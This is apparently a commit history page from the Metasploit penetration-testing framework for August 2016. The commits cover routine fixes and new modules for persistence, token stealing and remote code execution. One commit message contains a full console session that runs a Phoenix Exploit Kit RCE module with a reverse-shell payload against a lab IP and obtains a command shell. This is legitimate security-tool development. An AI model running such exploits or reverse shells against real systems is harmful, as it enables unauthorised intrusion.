Commit Graph

39287 Commits (5c447a6b13de331c8d1066d21f506fbbfbcc179c)

Author SHA1 Message Date
Brent Cook 5c447a6b13
Land #7240, add server_port to HTTP fingerprint 2016-08-24 13:53:31 -05:00
William Vu 61f1e7e9c2 Add server_port to HTTP fingerprint
MS-1982
2016-08-24 13:24:24 -05:00
William Vu 4bb93eebb3
Land #7239, typo fix for golden_ticket
Landing for @bcook-r7. This should be the only error of its kind.
2016-08-24 11:23:28 -05:00
Louis Sato 4a6b2ef8de
fixing typo for reference for golden ticket 2016-08-24 10:55:36 -05:00
Brendan 83160b7e49
Land #7173, Add post module to compress (zip) a file or directory 2016-08-24 09:38:04 -05:00
wchen-r7 89c3b6f399 Remove the -d flag for Linux machines 2016-08-23 18:43:50 -05:00
Pearce Barry 03e14ec86f
Land #7232, Net::SSH Regression Fixes
Fixes #7160
Fixes #7175
Fixes #7229
2016-08-23 14:53:42 -05:00
David Maloney 95b82219a3
Land #7233, ssh over L# pivot
this lands egypt's fix for using Net::SSH over L# pivots
2016-08-23 14:12:54 -05:00
Pearce Barry 222c85c343
Land #7223, Unvendor openvas-omp gem 2016-08-23 13:40:39 -05:00
William Vu 72c88e5bde
Add note about release notes to CONTRIBUTING.md 2016-08-22 15:15:22 -05:00
James Lee 8d2bdb2a71
Quote commands 2016-08-22 14:39:51 -05:00
James Lee b4a7562054
Use getpeername_as_array instead of peerinfo
`peerinfo` is intended to be human-readable and can be things like
"Remote Pipe" so splitting it here is the wrong thing to do.
2016-08-22 14:20:53 -05:00
James Lee bcf0062d47
Make SocketInterface things be Rex::Sockets 2016-08-22 14:17:00 -05:00
William Webb 3b3b4723c2
Land #7231, Fix Android Meterpreter command autoload and sysinfo 2016-08-22 12:22:43 -05:00
wchen-r7 0832833350
Land #7222, Add KB for multi/http/caidao_php_backdoor_exec 2016-08-22 11:51:02 -05:00
wchen-r7 0b73786e10 avoid bad filter 2016-08-22 11:47:39 -05:00
Jay Turla 1065b4cfe2 Linked the zip file 2016-08-23 00:33:04 +08:00
William Webb f2eb4b88a1
Land #7220, Add Phoenix Exploit Kit RCE 2016-08-22 11:16:30 -05:00
William Webb 455ba42f5b
Land #7218, Add new post-exploitation APIs for stealing access tokens 2016-08-22 10:55:42 -05:00
David Maloney 20947cd6cd
remove old dependency on net-ssh moneykpatch
the ssh_login_pubkey scanner relied on functionality that
was monkeypatched into our vendored copy. this was an uneeded solution
in the first palce, and we now use a more sane method of accomplishing
the same thing
2016-08-22 10:54:09 -05:00
David Maloney b6dff719f3
add a hard require to the ssh mixin
added hard require for SSHFactory into the ssh exploit mixin
this should prevent any laod-order bugs from cropping up again
2016-08-22 09:56:07 -05:00
Tim Wright 3955c4332d fix android autoload commands and sysinfo 2016-08-22 14:53:58 +01:00
Jay Turla 139d431230 eliminate space 2016-08-20 04:17:22 +08:00
dmohanty-r7 0c618cccef Use openvas-omp gem for crud operations
MS-1718
2016-08-19 15:14:32 -05:00
dmohanty-r7 4478136065 Unvendor openvas-omp gem
MS-1718
2016-08-19 15:14:32 -05:00
Jay Turla 51a2354fea Add KB for multi/http/caidao_php_backdoor_exec 2016-08-20 04:12:31 +08:00
Metasploit 87d34cfbba
Bump version of framework to 4.12.22 2016-08-19 10:02:28 -07:00
Jay Turla ee89b20ab7 remove 'BadChars' 2016-08-19 23:49:11 +08:00
wchen-r7 265adebd50 Fix typo 2016-08-19 10:44:24 -05:00
Jay Turla e3d1f8e97b Updated the description 2016-08-19 22:22:56 +08:00
Jay Turla 5a4f0cf72f run msftidy 2016-08-19 21:56:02 +08:00
Jay Turla c66ea5ff8f Correcting the date based on the EDB 2016-08-19 21:47:57 +08:00
Jay Turla d4c82868de Add Phoenix Exploit Kit Remote Code Execution
This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit Remote Code Execution via the geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which then silently installs malware.

```
msf exploit(phoenix_exec) > show options

Module options (exploit/multi/http/phoenix_exec):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.52.128               yes       The target address
   RPORT      80                           yes       The target port
   SSL        false                        no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /Phoenix/includes/geoip.php  yes       The path of geoip.php which is vulnerable to RCE
   VHOST                                   no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.52.129   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Phoenix Exploit Kit / Unix


msf exploit(phoenix_exec) > check
[+] 192.168.52.128:80 The target is vulnerable.
msf exploit(phoenix_exec) > exploit

[*] Started reverse TCP double handler on 192.168.52.129:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RZpbBEP77nS8Dvm4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "RZpbBEP77nS8Dvm4\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 5 opened (192.168.52.129:4444 -> 192.168.52.128:51748) at 2016-08-19 09:29:22 -0400

uname -a
Linux ubuntu 4.4.0-28-generic #47-Ubuntu SMP Fri Jun 24 10:08:35 UTC 2016 i686 i686 i686 GNU/Linux
```
2016-08-19 21:29:55 +08:00
Rob Fuller 42462f03e2
Land #7219, ps -c listing of child processes
Awesome work by @wvu-r7 to help with identifying processes
started by the meterpreter session.
2016-08-19 00:27:06 -04:00
William Vu 3d4d7aae14 Add ps -c to show child processes of current shell 2016-08-18 19:23:21 -05:00
wchen-r7 0f4d26af19 Update yard doc 2016-08-18 17:18:16 -05:00
wchen-r7 2a61450511 Add new POST exploitation APIs for stealing a token 2016-08-18 17:08:21 -05:00
wchen-r7 b081dbf703 Make destination required 2016-08-18 15:56:16 -05:00
William Webb 3eb3c5afa2
Land #7215, Fix drupal_coder_exec bugs #7215 2016-08-18 13:43:23 -05:00
James Lee 91417e62a8
Cleanup docs 2016-08-18 10:40:32 -05:00
William Vu bc9a402d9e
Land #7214, print_brute ip:rport fix 2016-08-17 22:48:40 -05:00
William Vu 2b6576b038
Land #7012, Linux service persistence module 2016-08-17 22:45:35 -05:00
William Vu c64d91457f
Land #7003, cron/crontab persistence module 2016-08-17 22:45:16 -05:00
William Vu 2fa4c7073b
Land #6995, SSH key persistence module 2016-08-17 22:44:57 -05:00
wchen-r7 e154aafaaa On Error Resume Next for zip.vbs 2016-08-17 17:08:38 -05:00
wchen-r7 60937ec5e9 If user is SYSTEM, then steal a token before decompression 2016-08-17 16:56:09 -05:00
William Webb 667c3566e5
Land #7209, Add functionality to pull .NET versions on Windows hosts 2016-08-17 12:48:05 -05:00
William Vu 4228868c29 Clean up after yourself
Can't use FileDropper. :(
2016-08-16 23:09:14 -05:00
William Vu 1f63f8f45b Don't override payload
pl is a cheap replacement.
2016-08-16 23:08:53 -05:00
William Vu b3402a45f7 Add generic payloads
Useful for testing and custom stuff.
2016-08-16 23:08:09 -05:00